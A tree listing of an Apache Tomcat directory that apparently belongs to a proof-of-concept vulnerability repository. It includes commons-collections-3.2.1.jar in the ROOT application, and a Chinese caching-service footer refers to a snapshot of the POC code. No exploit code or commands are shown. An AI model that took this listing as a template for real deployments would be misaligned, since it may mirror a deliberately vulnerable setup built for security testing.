├── [ 991] LocalStrings_pt_BR.properties │   │   │   │   │   ├── [2.2K] LocalStrings_pt.properties │   │   │   │   │   ├── [4.4K] LocalStrings_ru.properties │   │   │   │   │   ├── [2.5K] LocalStrings_zh_CN.properties │   │   │   │   │   ├── [4.0K] nonblocking │   │   │   │   │   │   ├── [ 205] ByteCounter$1.class │   │   │   │   │   │   ├── [2.7K] ByteCounter$CounterListener.class │   │   │   │   │   │   ├── [1.8K] ByteCounter.class │   │   │   │   │   │   ├── [5.2K] ByteCounter.java │   │   │   │   │   │   ├── [ 208] NumberWriter$1.class │   │   │   │   │   │   ├── [3.0K] NumberWriter$NumberWriterListener.class │   │   │   │   │   │   ├── [1.5K] NumberWriter.class │   │   │   │   │   │   └── [5.4K] NumberWriter.java │   │   │   │   │   ├── [4.0K] num │   │   │   │   │   │   ├── [2.1K] NumberGuessBean.class │   │   │   │   │   │   └── [2.5K] NumberGuessBean.java │   │   │   │   │   ├── [4.9K] RequestHeaderExample.class │   │   │   │   │   ├── [6.3K] RequestHeaderExample.java │   │   │   │   │   ├── [3.5K] RequestInfoExample.class │   │   │   │   │   ├── [4.5K] RequestInfoExample.java │   │   │   │   │   ├── [3.2K] RequestParamExample.class │   │   │   │   │   ├── [3.8K] RequestParamExample.java │   │   │   │   │   ├── [1.4K] ServletToJsp.class │   │   │   │   │   ├── [1.5K] ServletToJsp.java │   │   │   │   │   ├── [5.4K] SessionExample.class │   │   │   │   │   ├── [6.7K] SessionExample.java │   │   │   │   │   ├── [4.0K] sessions │   │   │   │   │   │   ├── [1.8K] DummyCart.class │   │   │   │   │   │   ├── [2.3K] DummyCart.java │   │   │   │   │   │   ├── [1.5K] Item.class │   │   │   │   │   │   └── [1.2K] Item.java │   │   │   │   │   ├── [4.0K] trailers │   │   │   │   │   │   ├── [ 214] ResponseTrailers$1.class │   │   │   │   │   │   ├── [1.4K] ResponseTrailers$TrailerFieldSupplier.class │   │   │   │   │   │   ├── [1.6K] ResponseTrailers.class │   │   │   │   │   │   └── [2.3K] ResponseTrailers.java │   │   │   │   │   ├── [4.0K] util │   │   │   │   │   │   ├── [1.9K] CookieFilter.class │   │   │   │   │   │   ├── [3.1K] CookieFilter.java │   │   │   │   │   │   ├── [1.1K] HTMLFilter.class │   │   │   │   │   │   └── [2.2K] HTMLFilter.java │   │   │   │   │   ├── [4.0K] validators │   │   │   │   │   │   ├── [1.5K] DebugValidator.class │   │   │   │   │   │   └── [2.9K] DebugValidator.java │   │   │   │   │   └── [4.0K] websocket │   │   │   │   │   ├── [4.0K] chat │   │   │   │   │   │   ├── [4.2K] ChatAnnotation.class │   │   │   │   │   │   └── [4.7K] ChatAnnotation.java │   │   │   │   │   ├── [4.0K] drawboard │   │   │   │   │   │   ├── [1.7K] Client$1.class │   │   │   │   │   │   ├── [4.9K] Client.class │   │   │   │   │   │   ├── [9.2K] Client.java │   │   │   │   │   │   ├── [ 799] DrawboardContextListener.class │   │   │   │   │   │   ├── [1.2K] DrawboardContextListener.java │   │   │   │   │   │   ├── [2.1K] DrawboardEndpoint$1.class │   │   │   │   │   │   ├── [1.6K] DrawboardEndpoint$2.class │   │   │   │   │   │   ├── [2.5K] DrawboardEndpoint$3$1.class │   │   │   │   │   │   ├── [1.3K] DrawboardEndpoint$3.class │   │   │   │   │   │   ├── [3.8K] DrawboardEndpoint.class │   │   │   │   │   │   ├── [9.1K] DrawboardEndpoint.java │   │   │   │   │   │   ├── [ 688] DrawMessage$ParseException.class │   │   │   │   │   │   ├── [5.4K] DrawMessage.class │   │   │   │   │   │   ├── [7.3K] DrawMessage.java │   │   │   │   │   │   ├── [ 732] Room$1$1.class │   │   │   │   │   │   ├── [ 754] Room$1.class │   │   │   │   │   │   ├── [ 906] Room$2.class │   │   │   │   │   │   ├── [1.5K] Room$MessageType.class │   │   │   │   │   │   ├── [3.7K] Room$Player.class │   │   │   │   │   │   ├── [8.0K] Room.class │   │   │   │   │   │   ├── [ 16K] Room.java │   │   │   │   │   │   └── [4.0K] wsmessages │   │   │   │   │   │   ├── [ 359] AbstractWebsocketMessage.class │   │   │   │   │   │   ├── [1.0K] AbstractWebsocketMessage.java │   │   │   │   │   │   ├── [ 590] BinaryWebsocketMessage.class │   │   │   │   │   │   ├── [1.2K] BinaryWebsocketMessage.java │   │   │   │   │   │   ├── [ 389] CloseWebsocketMessage.class │   │   │   │   │   │   ├── [1017] CloseWebsocketMessage.java │   │   │   │   │   │   ├── [ 583] StringWebsocketMessage.class │   │   │   │   │   │   └── [1.2K] StringWebsocketMessage.java │   │   │   │   │   ├── [4.0K] echo │   │   │   │   │   │   ├── [1.8K] EchoAnnotation.class │   │   │   │   │   │   ├── [2.4K] EchoAnnotation.java │   │   │   │   │   │   ├── [ 235] EchoAsyncAnnotation$1.class │   │   │   │   │   │   ├── [1.7K] EchoAsyncAnnotation$CompletedFuture.class │   │   │   │   │   │   ├── [2.8K] EchoAsyncAnnotation.class │   │   │   │   │   │   ├── [4.1K] EchoAsyncAnnotation.java │   │   │   │   │   │   ├── [ 214] EchoEndpoint$1.class │   │   │   │   │   │   ├── [1.6K] EchoEndpoint$EchoMessageHandlerBinary.class │   │   │   │   │   │   ├── [1.6K] EchoEndpoint$EchoMessageHandlerText.class │   │   │   │   │   │   ├── [1.2K] EchoEndpoint.class │   │   │   │   │   │   ├── [2.9K] EchoEndpoint.java │   │   │   │   │   │   ├── [1.8K] EchoStreamAnnotation.class │   │   │   │   │   │   ├── [2.3K] EchoStreamAnnotation.java │   │   │   │   │   │   └── [ 699] servers.json │   │   │   │   │   ├── [2.3K] ExamplesConfig.class │   │   │   │   │   ├── [2.4K] ExamplesConfig.java │   │   │   │   │   └── [4.0K] snake │   │   │   │   │   ├── [1.1K] Direction.class │   │   │   │   │   ├── [ 911] Direction.java │   │   │   │   │   ├── [ 807] Location$1.class │   │   │   │   │   ├── [1.3K] Location.class │   │   │   │   │   ├── [2.1K] Location.java │   │   │   │   │   ├── [4.7K] SnakeAnnotation.class │   │   │   │   │   ├── [5.0K] SnakeAnnotation.java │   │   │   │   │   ├── [5.0K] Snake.class │   │   │   │   │   ├── [4.6K] Snake.java │   │   │   │   │   ├── [ 832] SnakeTimer$1.class │   │   │   │   │   ├── [3.5K] SnakeTimer.class │   │   │   │   │   └── [3.7K] SnakeTimer.java │   │   │   │   ├── [4.0K] jsp │   │   │   │   │   ├── [1.7K] 403.jsp │   │   │   │   │   ├── [1.9K] 403.jsp.html │   │   │   │   │   ├── [2.0K] debug-taglib.tld │   │   │   │   │   ├── [3.2K] example-taglib.tld │   │   │   │   │   └── [4.9K] jsp2-example-taglib.tld │   │   │   │   ├── [4.0K] lib │   │   │   │   │   ├── [202K] taglibs-standard-impl-1.2.5.jar │   │   │   │   │   └── [ 39K] taglibs-standard-spec-1.2.5.jar │   │   │   │   ├── [4.0K] tags │   │   │   │   │   ├── [2.1K] displayProducts.tag │   │   │   │   │   ├── [ 818] helloWorld.tag │   │   │   │   │   └── [1.0K] panel.tag │   │   │   │   └── [ 15K] web.xml │   │   │   └── [4.0K] websocket │   │   │   ├── [4.6K] chat.xhtml │   │   │   ├── [ 41K] drawboard.xhtml │   │   │   ├── [7.1K] echo.xhtml │   │   │   ├── [1.3K] index.xhtml │   │   │   └── [9.4K] snake.xhtml │   │   ├── [4.0K] host-manager │   │   │   ├── [4.0K] css │   │   │   │   └── [2.9K] manager.css │   │   │   ├── [4.0K] images │   │   │   │   ├── [ 20K] asf-logo.svg │   │   │   │   └── [ 67K] tomcat.svg │   │   │   ├── [ 930] index.jsp │   │   │   ├── [4.0K] META-INF │   │   │   │   └── [1.3K] context.xml │   │   │   └── [4.0K] WEB-INF │   │   │   ├── [4.0K] jsp │   │   │   │   ├── [2.9K] 401.jsp │   │   │   │   ├── [3.9K] 403.jsp │   │   │   │   └── [2.5K] 404.jsp │   │   │   ├── [1.5K] manager.xml │   │   │   └── [5.2K] web.xml │   │   ├── [4.0K] manager │   │   │   ├── [4.0K] css │   │   │   │   └── [2.9K] manager.css │   │   │   ├── [4.0K] images │   │   │   │   ├── [ 20K] asf-logo.svg │   │   │   │   └── [ 67K] tomcat.svg │   │   │   ├── [ 930] index.jsp │   │   │   ├── [4.0K] META-INF │   │   │   │   └── [1.3K] context.xml │   │   │   ├── [4.4K] status.xsd │   │   │   ├── [4.0K] WEB-INF │   │   │   │   ├── [4.0K] jsp │   │   │   │   │   ├── [3.3K] 401.jsp │   │   │   │   │   ├── [4.3K] 403.jsp │   │   │   │   │   ├── [2.7K] 404.jsp │   │   │   │   │   ├── [3.4K] connectorCerts.jsp │   │   │   │   │   ├── [3.4K] connectorCiphers.jsp │   │   │   │   │   ├── [3.4K] connectorTrustedCerts.jsp │   │   │   │   │   ├── [8.1K] sessionDetail.jsp │   │   │   │   │   └── [ 11K] sessionsList.jsp │   │   │   │   └── [7.6K] web.xml │   │   │   └── [4.7K] xform.xsl │   │   └── [4.0K] ROOT │   │   ├── [ 27K] asf-logo-wide.svg │   │   ├── [ 713] bg-button.png │   │   ├── [1.9K] bg-middle.png │   │   ├── [1.4K] bg-nav.png │   │   ├── [3.0K] bg-upper.png │   │   ├── [ 21K] favicon.ico │   │   ├── [ 12K] index.jsp │   │   ├── [6.9K] RELEASE-NOTES.txt │   │   ├── [5.8K] tomcat.css │   │   ├── [ 67K] tomcat.svg │   │   └── [4.0K] WEB-INF │   │   ├── [4.0K] lib │   │   │   └── [562K] commons-collections-3.2.1.jar │   │   └── [1.2K] web.xml │   └── [4.0K] work │   └── [4.0K] Catalina │   └── [4.0K] localhost │   └── [4.0K] ROOT │   └── [4.0K] org │   └── [4.0K] apache │   └── [4.0K] jsp │   ├── [ 18K] index_jsp.class │   └── [ 30K] index_jsp.java └── [1.7K] README.md 117 directories, 645 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。